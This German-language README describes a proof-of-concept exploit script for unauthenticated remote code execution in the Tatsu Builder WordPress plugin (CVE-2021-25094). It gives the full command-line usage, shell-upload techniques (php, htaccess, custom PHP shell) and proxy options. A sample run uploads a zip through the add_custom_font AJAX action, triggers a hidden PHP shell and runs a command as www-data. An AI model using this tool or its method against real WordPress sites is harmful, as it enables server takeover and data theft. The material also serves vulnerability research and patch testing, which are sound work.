
Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung im Tatsu Builder WordPress-Plugin (CVE-2021-25094). Unterstützt mehrere Shell-Techniken, Proxy und Komprimierungsstufen.
Einfacher PoC einer nicht authentifizierten RCE in Tatsu Builder <= 3.3.11, bereitgestellt als Beispiel.
Vollständiger Artikel hier: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/
Verwendung:
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd
positional arguments:
url Wordpress-angreifbare URL (Beispiel: https://mywordpress.com/)
cmd Auszuführender OS-Befehl
optional arguments:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
--technique TECHNIQUE
Shell-Technik: php | htaccess | custom
--customShell CUSTOMSHELL
Geben Sie eine benutzerdefinierte PHP-Shell-Datei an, die einen base64-codierten Befehl als $_POST['text']-Eingabe nimmt
--keep KEEP Löscht die hochgeladene PHP-Shell nicht automatisch
--proxy PROXY Geben Sie einen HTTP-Proxy an und verwenden Sie ihn (Beispiel: http://localhost:8080)
--compressionLevel COMPRESSIONLEVEL
Komprimierungsstufe der Zip-Datei (0 bis 9, Standard 9)
Beispiel:
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: Pre-Auth RCE-Exploit für Tatsu Wordpress Plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)
[+] Erstelle eine Zip-Datei mit der Shell-Technik 'php'
[+] Lade Zip-Archiv hoch zu http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload erfolgreich
[+] Shell auslösen bei http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit erfolgreich!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell-Datei wurde automatisch gelöscht, das übergeordnete Verzeichnis bleibt jedoch auf dem Webserver
[+] Erledigt